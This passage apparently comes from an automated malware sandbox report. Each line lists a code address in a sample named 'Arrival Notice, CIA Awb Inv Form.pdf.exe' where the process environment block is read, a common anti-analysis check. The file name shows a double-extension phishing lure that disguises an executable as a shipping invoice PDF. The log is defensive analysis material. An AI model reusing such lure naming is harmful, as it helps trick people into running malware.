Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe Code function: 1_2_02B718FC mov eax, dword ptr fs:[00000030h] 1_2_02B718FC
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe Code function: 1_2_02B70232 mov eax, dword ptr fs:[00000030h] 1_2_02B70232
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe Code function: 1_2_02B6C602 mov eax, dword ptr fs:[00000030h] 1_2_02B6C602
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe Code function: 6_2_1EA2CEA0 mov eax, dword ptr fs:[00000030h] 6_2_1EA2CEA0
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe Code function: 6_2_1EAB0EAD mov eax, dword ptr fs:[00000030h] 6_2_1EAB0EAD
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe Code function: 6_2_1EAB0EAD mov eax, dword ptr fs:[00000030h] 6_2_1EAB0EAD
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe Code function: 6_2_1EA01EB2 mov ecx, dword ptr fs:[00000030h] 6_2_1EA01EB2
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe Code function: 6_2_1EA01EB2 mov ecx, dword ptr fs:[00000030h] 6_2_1EA01EB2
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe Code function: 6_2_1EA01EB2 mov eax, dword ptr fs:[00000030h] 6_2_1EA01EB2
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe Code function: 6_2_1EA01EB2 mov ecx, dword ptr fs:[00000030h] 6_2_1EA01EB2
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe Code function: 6_2_1EA01EB2 mov ecx, dword ptr fs:[00000030h] 6_2_1EA01EB2
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe Code function: 6_2_1EA01EB2 mov eax, dword ptr fs:[00000030h] 6_2_1EA01EB2
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe Code function: 6_2_1EA01EB2 mov ecx, dword ptr fs:[00000030h] 6_2_1EA01EB2
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe Code function: 6_2_1EA01EB2 mov ecx, dword ptr fs:[00000030h] 6_2_1EA01EB2
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe Code function: 6_2_1EA01EB2 mov eax, dword ptr fs:[00000030h] 6_2_1EA01EB2
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe Code function: 6_2_1EA01EB2 mov ecx, dword ptr fs:[00000030h] 6_2_1EA01EB2
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe Code function: 6_2_1EA01EB2 mov ecx, dword ptr fs:[00000030h] 6_2_1EA01EB2
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe Code function: 6_2_1EA01EB2 mov eax, dword ptr fs:[00000030h] 6_2_1EA01EB2
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe Code function: 6_2_1EA22EB8 mov eax, dword ptr fs:[00000030h] 6_2_1EA22EB8
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe Code function: 6_2_1EA22EB8 mov eax, dword ptr fs:[00000030h] 6_2_1EA22EB8
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe Code function: 6_2_1EA1BE80 mov eax, dword ptr fs:[00000030h] 6_2_1EA1BE80
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe Code function: 6_2_1EA1AE89 mov eax, dword ptr fs:[00000030h] 6_2_1EA1AE89
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe Code function: 6_2_1EA1AE89 mov eax, dword ptr fs:[00000030h] 6_2_1EA1AE89
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe Code function: 6_2_1EAAEEE7 mov eax, dword ptr fs:[00000030h] 6_2_1EAAEEE7
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe Code function: 6_2_1EA21EED mov eax, dword ptr fs:[00000030h] 6_2_1EA21EED
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe Code function: 6_2_1EA21EED mov eax, dword ptr fs:[00000030h] 6_2_1EA21EED
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe Code function: 6_2_1EA21EED mov eax, dword ptr fs:[00000030h] 6_2_1EA21EED
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe Code function: 6_2_1EA93EFC mov eax, dword ptr fs:[00000030h] 6_2_1EA93EFC
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe Code function: 6_2_1EA77EC3 mov eax, dword ptr fs:[00000030h] 6_2_1EA77EC3
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe Code function: 6_2_1EA77EC3 mov ecx, dword ptr fs:[00000030h] 6_2_1EA77EC3
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe Code function: 6_2_1EAC4EC1 mov eax, dword ptr fs:[00000030h] 6_2_1EAC4EC1
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe Code function: 6_2_1E9ECEF0 mov eax, dword ptr fs:[00000030h] 6_2_1E9ECEF0
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe Code function: 6_2_1E9ECEF0 mov eax, dword ptr fs:[00000030h] 6_2_1E9ECEF0
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe Code function: 6_2_1E9ECEF0 mov eax, dword ptr fs:[00000030h] 6_2_1E9ECEF0
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe Code function: 6_2_1E9ECEF0 mov eax, dword ptr fs:[00000030h] 6_2_1E9ECEF0
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe Code function: 6_2_1E9ECEF0 mov eax, dword ptr fs:[00000030h] 6_2_1E9ECEF0
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe Code function: 6_2_1E9ECEF0 mov eax, dword ptr fs:[00000030h] 6_2_1E9ECEF0
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe Code function: 6_2_1EA2BED0 mov eax, dword ptr fs:[00000030h] 6_2_1EA2BED0
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe Code function: 6_2_1E9F2EE8 mov eax, dword ptr fs:[00000030h] 6_2_1E9F2EE8
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe Code function: 6_2_1E9F2EE8 mov eax, dword ptr fs:[00000030h] 6_2_1E9F2EE8
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe Code function: 6_2_1E9F2EE8 mov eax, dword ptr fs:[00000030h] 6_2_1E9F2EE8
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe Code function: 6_2_1E9F2EE8 mov eax, dword ptr fs:[00000030h] 6_2_1E9F2EE8
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe Code function: 6_2_1EAB9ED2 mov eax, dword ptr fs:[00000030h] 6_2_1EAB9ED2
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe Code function: 6_2_1EA31ED8 mov eax, dword ptr fs:[00000030h] 6_2_1EA31ED8
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe Code function: 6_2_1E9F3EE2 mov eax, dword ptr fs:[00000030h] 6_2_1E9F3EE2
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe Code function: 6_2_1E9EBE18 mov ecx, dword ptr fs:[00000030h] 6_2_1E9EBE18
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe Code function: 6_2_1E9F3E14 mov eax, dword ptr fs:[00000030h] 6_2_1E9F3E14
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe Code function: 6_2_1E9F3E14 mov eax, dword ptr fs:[00000030h] 6_2_1E9F3E14
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe Code function: 6_2_1E9F3E14 mov eax, dword ptr fs:[00000030h] 6_2_1E9F3E14
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe Code function: 6_2_1EAB8E26 mov eax, dword ptr fs:[00000030h] 6_2_1EAB8E26
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe Code function: 6_2_1EAB8E26 mov eax, dword ptr fs:[00000030h] 6_2_1EAB8E26
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe Code function: 6_2_1EAB8E26 mov eax, dword ptr fs:[00000030h] 6_2_1EAB8E26
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe Code function: 6_2_1EAB8E26 mov eax, dword ptr fs:[00000030h] 6_2_1EAB8E26
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe Code function: 6_2_1EA86E30 mov eax, dword ptr fs:[00000030h] 6_2_1EA86E30
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe Code function: 6_2_1EA86E30 mov eax, dword ptr fs:[00000030h] 6_2_1EA86E30
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe Code function: 6_2_1EA85E30 mov eax, dword ptr fs:[00000030h] 6_2_1EA85E30
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe Code function: 6_2_1EA85E30 mov ecx, dword ptr fs:[00000030h] 6_2_1EA85E30
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe Code function: 6_2_1EA85E30 mov eax, dword ptr fs:[00000030h] 6_2_1EA85E30
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe Code function: 6_2_1EA85E30 mov eax, dword ptr fs:[00000030h] 6_2_1EA85E30
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe Code function: 6_2_1EA85E30 mov eax, dword ptr fs:[00000030h] 6_2_1EA85E30
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe Code function: 6_2_1EA85E30 mov eax, dword ptr fs:[00000030h] 6_2_1EA85E30
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe Code function: 6_2_1EA2CE3F mov eax, dword ptr fs:[00000030h] 6_2_1EA2CE3F
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe Code function: 6_2_1E9F3E01 mov eax, dword ptr fs:[00000030h] 6_2_1E9F3E01
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe Code function: 6_2_1E9F6E00 mov eax, dword ptr fs:[00000030h] 6_2_1E9F6E00
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe Code function: 6_2_1E9F6E00 mov eax, dword ptr fs:[00000030h] 6_2_1E9F6E00
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe Code function: 6_2_1E9F6E00 mov eax, dword ptr fs:[00000030h] 6_2_1E9F6E00
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe Code function: 6_2_1E9F6E00 mov eax, dword ptr fs:[00000030h] 6_2_1E9F6E00
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe Code function: 6_2_1E9F2E32 mov eax, dword ptr fs:[00000030h] 6_2_1E9F2E32
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe Code function: 6_2_1EAC4E03 mov eax, dword ptr fs:[00000030h] 6_2_1EAC4E03
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe Code function: 6_2_1EA28E15 mov eax, dword ptr fs:[00000030h] 6_2_1EA28E15
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe Code function: 6_2_1EA6FE1F mov eax, dword ptr fs:[00000030h] 6_2_1EA6FE1F
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe Code function: 6_2_1EA6FE1F mov eax, dword ptr fs:[00000030h] 6_2_1EA6FE1F
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe Code function: 6_2_1EA6FE1F mov eax, dword ptr fs:[00000030h] 6_2_1EA6FE1F
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe Code function: 6_2_1EA6FE1F mov eax, dword ptr fs:[00000030h] 6_2_1EA6FE1F
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe Code function: 6_2_1EAA0E6D mov eax, dword ptr fs:[00000030h] 6_2_1EAA0E6D
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe Code function: 6_2_1EAA0E6D mov eax, dword ptr fs:[00000030h] 6_2_1EAA0E6D
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe Code function: 6_2_1EAA0E6D mov eax, dword ptr fs:[00000030h] 6_2_1EAA0E6D
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe Code function: 6_2_1EAA0E6D mov eax, dword ptr fs:[00000030h] 6_2_1EAA0E6D
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe Code function: 6_2_1EAA0E6D mov eax, dword ptr fs:[00000030h] 6_2_1EAA0E6D
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe Code function: 6_2_1EAA0E6D mov eax, dword ptr fs:[00000030h] 6_2_1EAA0E6D
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe Code function: 6_2_1EAA0E6D mov eax, dword ptr fs:[00000030h] 6_2_1EAA0E6D
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe Code function: 6_2_1EAA0E6D mov eax, dword ptr fs:[00000030h] 6_2_1EAA0E6D
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe Code function: 6_2_1EAA0E6D mov eax, dword ptr fs:[00000030h] 6_2_1EAA0E6D
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe Code function: 6_2_1EAA0E6D mov eax, dword ptr fs:[00000030h] 6_2_1EAA0E6D
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe Code function: 6_2_1EAA0E6D mov eax, dword ptr fs:[00000030h] 6_2_1EAA0E6D
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe Code function: 6_2_1EAA0E6D mov eax, dword ptr fs:[00000030h] 6_2_1EAA0E6D
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe Code function: 6_2_1EAA0E6D mov eax, dword ptr fs:[00000030h] 6_2_1EAA0E6D
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe Code function: 6_2_1EAA0E6D mov eax, dword ptr fs:[00000030h] 6_2_1EAA0E6D
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe Code function: 6_2_1EAC4E62 mov eax, dword ptr fs:[00000030h] 6_2_1EAC4E62
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe Code function: 6_2_1EAAEE78 mov eax, dword ptr fs:[00000030h] 6_2_1EAAEE78
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe Code function: 6_2_1EA2CE70 mov eax, dword ptr fs:[00000030h] 6_2_1EA2CE70
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe Code function: 6_2_1EA27E71 mov eax, dword ptr fs:[00000030h] 6_2_1EA27E71
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe Code function: 6_2_1E9EDE45 mov eax, dword ptr fs:[00000030h] 6_2_1E9EDE45
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe Code function: 6_2_1E9EDE45 mov ecx, dword ptr fs:[00000030h] 6_2_1E9EDE45
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe Code function: 6_2_1E9EFE40 mov eax, dword ptr fs:[00000030h] 6_2_1E9EFE40
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe Code function: 6_2_1E9EAE40 mov eax, dword ptr fs:[00000030h] 6_2_1E9EAE40
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe Code function: 6_2_1E9EAE40 mov eax, dword ptr fs:[00000030h] 6_2_1E9EAE40
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe Code function: 6_2_1E9EAE40 mov eax, dword ptr fs:[00000030h] 6_2_1E9EAE40
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe Code function: 6_2_1EA1EE48 mov eax, dword ptr fs:[00000030h] 6_2_1EA1EE48
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe Code function: 6_2_1E9F1E70 mov eax, dword ptr fs:[00000030h] 6_2_1E9F1E70
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe Code function: 6_2_1EA6DE50 mov eax, dword ptr fs:[00000030h] 6_2_1EA6DE50
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe Code function: 6_2_1EA6DE50 mov eax, dword ptr fs:[00000030h] 6_2_1EA6DE50
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe Code function: 6_2_1EA6DE50 mov ecx, dword ptr fs:[00000030h] 6_2_1EA6DE50
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe Code function: 6_2_1EA6DE50 mov eax, dword ptr fs:[00000030h] 6_2_1EA6DE50
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe Code function: 6_2_1EA6DE50 mov eax, dword ptr fs:[00000030h] 6_2_1EA6DE50
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe Code function: 6_2_1E9EBE60 mov eax, dword ptr fs:[00000030h] 6_2_1E9EBE60
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe Code function: 6_2_1E9EBE60 mov eax, dword ptr fs:[00000030h] 6_2_1E9EBE60
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe Code function: 6_2_1EA1CFB0 mov eax, dword ptr fs:[00000030h] 6_2_1EA1CFB0
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe Code function: 6_2_1EA1CFB0 mov eax, dword ptr fs:[00000030h] 6_2_1EA1CFB0
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe Code function: 6_2_1EA28FBC mov eax, dword ptr fs:[00000030h] 6_2_1EA28FBC
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe Code function: 6_2_1E9F4FB6 mov eax, dword ptr fs:[00000030h] 6_2_1E9F4FB6
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe Code function: 6_2_1EA78F8B mov eax, dword ptr fs:[00000030h] 6_2_1EA78F8B
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe Code function: 6_2_1EA78F8B mov eax, dword ptr fs:[00000030h] 6_2_1EA78F8B
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe Code function: 6_2_1EA78F8B mov eax, dword ptr fs:[00000030h] 6_2_1EA78F8B
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe Code function: 6_2_1EA00F90 mov eax, dword ptr fs:[00000030h] 6_2_1EA00F90
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe Code function: 6_2_1EA00F90 mov ecx, dword ptr fs:[00000030h] 6_2_1EA00F90
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe Code function: 6_2_1EA00F90 mov eax, dword ptr fs:[00000030h] 6_2_1EA00F90
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe Code function: 6_2_1EA00F90 mov eax, dword ptr fs:[00000030h] 6_2_1EA00F90
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe Code function: 6_2_1EA00F90 mov eax, dword ptr fs:[00000030h] 6_2_1EA00F90
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe Code function: 6_2_1EA00F90 mov eax, dword ptr fs:[00000030h] 6_2_1EA00F90
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe Code function: 6_2_1EA00F90 mov eax, dword ptr fs:[00000030h] 6_2_1EA00F90
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe Code function: 6_2_1EA00F90 mov eax, dword ptr fs:[00000030h] 6_2_1EA00F90
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe Code function: 6_2_1EA00F90 mov eax, dword ptr fs:[00000030h] 6_2_1EA00F90
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe Code function: 6_2_1EA00F90 mov eax, dword ptr fs:[00000030h] 6_2_1EA00F90
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe Code function: 6_2_1EA00F90 mov eax, dword ptr fs:[00000030h] 6_2_1EA00F90
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe Code function: 6_2_1EA00F90 mov eax, dword ptr fs:[00000030h] 6_2_1EA00F90
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe Code function: 6_2_1EA00F90 mov eax, dword ptr fs:[00000030h] 6_2_1EA00F90
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe Code function: 6_2_1EA1BF93 mov eax, dword ptr fs:[00000030h] 6_2_1EA1BF93
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe Code function: 6_2_1E9F1FAA mov eax, dword ptr fs:[00000030h] 6_2_1E9F1FAA
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe Code function: 6_2_1EA06FE0 mov eax, dword ptr fs:[00000030h] 6_2_1EA06FE0
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe Code function: 6_2_1EA06FE0 mov ecx, dword ptr fs:[00000030h] 6_2_1EA06FE0
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe Code function: 6_2_1EA06FE0 mov ecx, dword ptr fs:[00000030h] 6_2_1EA06FE0
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe Code function: 6_2_1EA06FE0 mov eax, dword ptr fs:[00000030h] 6_2_1EA06FE0
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe Code function: 6_2_1EA06FE0 mov ecx, dword ptr fs:[00000030h] 6_2_1EA06FE0
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe Code function: 6_2_1EA06FE0 mov ecx, dword ptr fs:[00000030h] 6_2_1EA06FE0
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe Code function: 6_2_1EA06FE0 mov eax, dword ptr fs:[00000030h] 6_2_1EA06FE0
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe Code function: 6_2_1EA06FE0 mov eax, dword ptr fs:[00000030h] 6_2_1EA06FE0
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe Code function: 6_2_1EA06FE0 mov eax, dword ptr fs:[00000030h] 6_2_1EA06FE0
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe Code function: 6_2_1EA06FE0 mov eax, dword ptr fs:[00000030h] 6_2_1EA06FE0
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe Code function: 6_2_1EA06FE0 mov eax, dword ptr fs:[00000030h] 6_2_1EA06FE0
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe Code function: 6_2_1EA06FE0 mov eax, dword ptr fs:[00000030h] 6_2_1EA06FE0
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe Code function: 6_2_1EA06FE0 mov eax, dword ptr fs:[00000030h] 6_2_1EA06FE0
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe Code function: 6_2_1EA06FE0 mov eax, dword ptr fs:[00000030h] 6_2_1EA06FE0
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe Code function: 6_2_1EA06FE0 mov eax, dword ptr fs:[00000030h] 6_2_1EA06FE0
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe Code function: 6_2_1EA06FE0 mov eax, dword ptr fs:[00000030h] 6_2_1EA06FE0
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe Code function: 6_2_1EA06FE0 mov eax, dword ptr fs:[00000030h] 6_2_1EA06FE0
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe Code function: 6_2_1EA06FE0 mov eax, dword ptr fs:[00000030h] 6_2_1EA06FE0
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe Code function: 6_2_1E9E9FD0 mov eax, dword ptr fs:[00000030h] 6_2_1E9E9FD0
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe Code function: 6_2_1EAC4FFF mov eax, dword ptr fs:[00000030h] 6_2_1EAC4FFF
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe Code function: 6_2_1EA18FFB mov eax, dword ptr fs:[00000030h] 6_2_1EA18FFB
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe Code function: 6_2_1E9EBFC0 mov eax, dword ptr fs:[00000030h] 6_2_1E9EBFC0
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe Code function: 6_2_1EA71FC9 mov eax, dword ptr fs:[00000030h] 6_2_1EA71FC9
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe Code function: 6_2_1EA71FC9 mov eax, dword ptr fs:[00000030h] 6_2_1EA71FC9
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe Code function: 6_2_1EA71FC9 mov eax, dword ptr fs:[00000030h] 6_2_1EA71FC9
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe Code function: 6_2_1EA71FC9 mov eax, dword ptr fs:[00000030h] 6_2_1EA71FC9
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe Code function: 6_2_1EA71FC9 mov eax, dword ptr fs:[00000030h] 6_2_1EA71FC9
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe Code function: 6_2_1EA71FC9 mov eax, dword ptr fs:[00000030h] 6_2_1EA71FC9
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe Code function: 6_2_1EA71FC9 mov eax, dword ptr fs:[00000030h] 6_2_1EA71FC9
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe Code function: 6_2_1EA71FC9 mov eax, dword ptr fs:[00000030h] 6_2_1EA71FC9
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe Code function: 6_2_1EA71FC9 mov eax, dword ptr fs:[00000030h] 6_2_1EA71FC9